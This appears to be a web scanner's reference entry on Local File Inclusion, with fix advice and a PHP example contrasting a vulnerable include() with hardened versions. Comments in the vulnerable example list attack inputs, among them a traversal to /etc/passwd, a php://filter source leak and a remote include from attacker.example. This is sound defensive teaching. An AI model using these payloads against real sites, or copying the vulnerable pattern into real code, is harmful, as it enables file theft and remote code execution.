Test Methods (Detailed Overview)

Here is a list of every test performed by Web Scan Service.

Local File Inclusion

Remediation Task

Validate user input

WASC Classification

Logical Attacks: Abuse of Functionality

Affected Products

This issue may affect many different types of products; it is not specific to one vendor, language or platform.

Technical Description

Malicious remote/local file inclusion vulnerabilities are found in many applications. Developers often use or concatenate potentially hostile input directly in file or stream functions, or improperly trust the content of input files.

On many platforms, frameworks allow the use of external object references such as URLs or file system paths. When such data is insufficiently checked, arbitrary remote or hostile content can be included, processed or invoked by the web server.

This allows attackers to perform:
  • Remote code execution
  • Remote root kit installation and complete system compromise
  • On Windows, internal system compromise may be possible because PHP's file functions accept UNC (SMB) paths, so an included path such as \\host\share\file is fetched over SMB

This attack is particularly prevalent in PHP, and extreme care must be taken with any stream or file function to ensure that user-supplied input does not influence file names.

Fix Recommendation

[1] Validate and sanitize any user input that reaches vulnerable functions (file operations, include/require and eval() statements). Where applicable, use a white list of allowed filenames for inclusion and map the user's value onto that list rather than building a path from it; blacklisting "../" or "http://" is not sufficient, because alternative encodings, absolute paths and wrappers such as php://filter bypass such filters.

[2] Limit the use of dynamic inputs in vulnerable functions.

[3] Unless required, disable allow_url_fopen in php.ini (PHP's configuration file): replace "allow_url_fopen = On" with "allow_url_fopen = Off". Also make sure "allow_url_include = Off" is set (PHP 5.2 and later; this is the default), since that directive is the one governing remote URLs in include/require. Neither setting prevents local file inclusion, so [1] and [2] remain necessary; open_basedir can additionally confine the files PHP is allowed to open to a given directory tree.
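As an added illustration of the technical description and the fix recommendation above (this is example code written for this page, not code from Web Scan Service or from any scanned product), the following PHP shows a page-selection include in its vulnerable form next to two hardened forms: the white-list mapping recommended in [1], and a realpath() containment check as defence in depth. It assumes a hypothetical templates/ directory beside the script containing home.php, about.php and contact.php.

```php
<?php
// Added example, not code from the Web Scan Service page. Assumes a
// templates/ directory next to this script holding home.php, about.php
// and contact.php (hypothetical file names).

// VULNERABLE: the request parameter flows straight into include().
//   ?page=../../../../etc/passwd                                reads an arbitrary local file
//   ?page=php://filter/convert.base64-encode/resource=config.php  leaks PHP source
//   ?page=http://attacker.example/shell.txt                    executes remote code
//                                                              when allow_url_include is On
function render_page_vulnerable(string $page): void
{
    include $page;
}

// HARDENED (1): the user's value is only ever a key into a fixed white list.
// The file name that reaches include() is chosen by the application, so
// traversal sequences, wrappers and URLs never become part of a path.
const ALLOWED_PAGES = [
    'home'    => 'templates/home.php',
    'about'   => 'templates/about.php',
    'contact' => 'templates/contact.php',
];

function render_page_safe(string $page): bool
{
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        http_response_code(404);
        return false;
    }
    include __DIR__ . '/' . ALLOWED_PAGES[$page];
    return true;
}

// HARDENED (2), defence in depth when the set of files is dynamic: restrict
// the name to a plain identifier, resolve it with realpath() and require the
// result to stay inside the base directory. realpath() returns false for
// nonexistent files and for php://, http:// and other wrappers, so those are
// rejected as well.
function resolve_within(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !preg_match('/^[A-Za-z0-9_-]+$/', $name)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$page = $_GET['page'] ?? 'home';
if (!render_page_safe($page)) {
    echo 'Unknown page';
}
```

The white-list form is the one to prefer: the request never contributes characters to a path, so there is nothing to sanitize. resolve_within() is useful where templates are added without a code change, but it still depends on the identifier regex and on the realpath() containment check, and it should be combined with the php.ini settings from [3] rather than replace them.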